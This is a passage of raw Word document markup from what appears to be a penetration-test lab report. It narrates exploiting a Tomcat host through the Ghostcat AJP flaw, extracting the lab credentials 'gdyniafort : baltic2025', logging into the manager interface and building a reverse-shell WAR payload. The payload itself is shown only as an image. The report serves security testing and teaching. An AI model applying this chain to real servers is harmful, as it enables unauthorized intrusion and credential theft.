          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The tester reviews /stocznia/_backup/ and locates file.bak, accessible via curl or wget</w:t>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="98" w:name="paragraph44"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource44"</w:instrText>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.27</w:t>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:bookmarkStart w:id="99" w:name="paragraph45"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource45"</w:instrText>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.28</w:t>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. Its hexadecimal content is analyzed in CyberChef, revealing layered Base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>hex encoding</w:t>
      </w:r>
      <w:r w:rsidR="000833BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in Image 5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. After decoding, the string discloses CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>1938 (Ghostcat), a known Apache Tomcat AJP vulnerability that permits unauthorized file retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7506F7F7" w14:textId="77777777" w:rsidR="00140952" w:rsidRPr="00D77DFE" w:rsidRDefault="00140952" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B54FC30" w14:textId="77777777" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="00140952" w:rsidP="000833BC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2256408E" wp14:editId="25F47EF6">
            <wp:extent cx="3876675" cy="2475644"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="24016848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8481" name="Picture 18" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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3884481" cy="2480629"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76758D95" w14:textId="1866EF15" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="000833BC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 5.1: Results from CyberChef after decoding</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9A926" w14:textId="01A67C28" w:rsidR="00647F5C" w:rsidRDefault="00647F5C" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Research identifies a public exploitation script (Ghostcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>CNVD</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">10487). Using this tool against the AJP service on port 8009, the tester extracts /WEB-INF/keys.txt, which contains the credentials: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>gdyniafort :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> baltic2025</w:t>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="100" w:name="paragraph46"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource46"</w:instrText>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figures A.29</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-A.31(see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43403E8D" w14:textId="77777777" w:rsidR="00AC2949" w:rsidRPr="00D77DFE" w:rsidRDefault="00AC2949" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A34992E" w14:textId="6CFA264F" w:rsidR="00DD5501" w:rsidRPr="00D77DFE" w:rsidRDefault="00DD5501" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc223521125"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.4 Exploiting 10.0.2.178</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="534A8AF5" w14:textId="34CCBF61" w:rsidR="000833BC" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="004F6D1C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>With Tomcat’s /manager interface previously identified, the tester authenticates successfully using these credentials</w:t>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="102" w:name="paragraph50"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource50"</w:instrText>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.32</w:t>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:bookmarkStart w:id="103" w:name="paragraph51"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource51"</w:instrText>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.33</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F057ED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the Manager application supports WAR </w:t>
      </w:r>
      <w:r w:rsidR="004F5AE9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">(Web Application Archive) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>deployment</w:t>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="104" w:name="paragraph52"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource52"</w:instrText>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.34</w:t>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the tester generate</w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> a reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">shell payload </w:t>
      </w:r>
      <w:r w:rsidR="000833BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>as shown in Image 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2809B2EF" w14:textId="77777777" w:rsidR="00512AA9" w:rsidRDefault="00087B73" w:rsidP="000833BC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0FBAA4" wp14:editId="472D08BC">
            <wp:extent cx="4963886" cy="354564"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="683549582" name="Picture 25"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49582" name="Picture 25" descr="A yellow rectangular object with black text&#10;&#10;AI-generated content may be incorrect."/>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 r="7209" b="-2499"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5078271" cy="362734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
